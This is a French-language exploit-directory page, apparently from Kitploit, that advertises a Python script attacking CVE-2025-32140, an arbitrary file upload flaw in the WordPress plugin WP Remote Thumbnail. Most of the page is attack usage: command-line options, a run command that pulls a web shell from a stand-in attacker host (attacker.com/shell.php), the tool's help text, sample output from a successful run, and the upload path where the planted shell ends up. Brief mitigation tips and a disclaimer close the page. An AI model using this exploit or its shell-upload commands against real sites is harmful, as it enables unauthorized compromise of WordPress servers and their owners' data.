Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/nxploited/cve-2025-32140
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-32140

CVE-2025-32140

Le plugin WordPress WP Remote Thumbnail <= 1.3.2 est vulnérable au téléchargement arbitraire de fichiers.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2025-32140 – Exploitation de la miniature à distance WP (Téléversement arbitraire de fichiers)


📝 Description

CVE-2025-32140 est une vulnérabilité critique dans le plugin WP Remote Thumbnail pour WordPress. Elle permet à des attaquants authentifiés (disposant des autorisations de contributeur ou supérieures) de téléverser des fichiers arbitraires, tels que des web shells, en abusant d'une fonctionnalité défectueuse qui accepte des URL non assainies.

Le plugin ne parvient pas à valider le type de fichier ou le contenu récupéré à partir de l'URL remote_thumb fournie. Cela permet aux attaquants d'enregistrer des fichiers PHP malveillants (par exemple, des backdoors) dans le répertoire /wp-content/uploads.


⚠️ Composant vulnérable

  • Plugin : WP Remote Thumbnail
  • Versions vulnérables : <= 1.3.2
  • Version corrigée : Pas encore publiée
  • Vecteur d'attaque : Réseau
  • Privilèges requis : Faibles (utilisateur authentifié avec la capacité )
edit_post
  • Score CVSS : 9.9 (Critique)

  • 🛠 Script d'exploitation

    Ce script Python automatise l'exploitation de CVE-2025-32140, en effectuant les étapes suivantes :

    1. Se connecte au site WordPress cible.
    2. Extrait automatiquement les nonces requis.
    3. Construit et envoie une requête malveillante via le paramètre remote_thumb.
    4. Téléverse un web shell sur le site cible.

    🔧 Options de la ligne de commande

    OptionAliasDescription
    --url-uURL du site WordPress cible (par exemple, http://target.com/wordpress)
    --username-unNom d'utilisateur WordPress disposant de privilèges d'édition d'articles
    --password-pMot de passe pour le nom d'utilisateur spécifié
    --user_ID-uidID utilisateur WordPress (généralement 1 pour l'administrateur)
    --post_ID-pidID de l'article à modifier (peut être un brouillon)
    --shellURL directe d'un web shell PHP hébergé sur le serveur de l'attaquant

    🚀 Utilisation

    root@kitploit:~
    python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
    

    📖 Utilisation et aide

    root@kitploit:~
    
                                                                                                                    
    usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
    
    Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
    
    options:
      -h, --help            show this help message and exit
      --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
      --username, -un USERNAME
                            Username
      --password, -p PASSWORD
                            Password
      --user_ID, -uid USER_ID
                            User ID (usually 1 for admin)
      --post_ID, -pid POST_ID
                            Target post ID
      --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
    
    

    📋 Exemple de sortie

    root@kitploit:~
    [+] Logged in successfully.
    [+] Cookies set successfully.
    [DEBUG] Extracted _wpnonce: b4ef78e77d
    [DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
    [DEBUG] Extracted closedpostboxesnonce: 52be514040
    [DEBUG] Extracted samplepermalinknonce: 7b213c6597
    [DEBUG] Extracted wprthumb_nonce: 45803ee312
    [DEBUG] Extracted X-WP-Nonce: None
    [+] Exploit POST sent successfully. Check your uploads directory.
    By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
    
    

    📂 Emplacement du shell

    Une fois l'exploit réalisé, le web shell téléversé sera probablement stocké à l'adresse :

    root@kitploit:~
    http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
    

    Remplacez YYYY/MM par l'année et le mois en cours du téléversement.


    🛡 Recommandations

    Pour atténuer le risque posé par cette vulnérabilité :

    1. Mettez à jour le plugin vers la dernière version (une fois un correctif publié).
    2. Restreignez les capacités de téléversement de fichiers aux utilisateurs de confiance uniquement.
    3. Désactivez la fonctionnalité de récupération de miniature à distance si elle n'est pas nécessaire.

    ⚠️ Avertissement

    Ce script est fourni à des fins éducatives uniquement.
    L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet exploit.


    👤 Auteur

    Par : Nxploited ( Khaled Alenazi ) 🌟

    Télécharger l’outil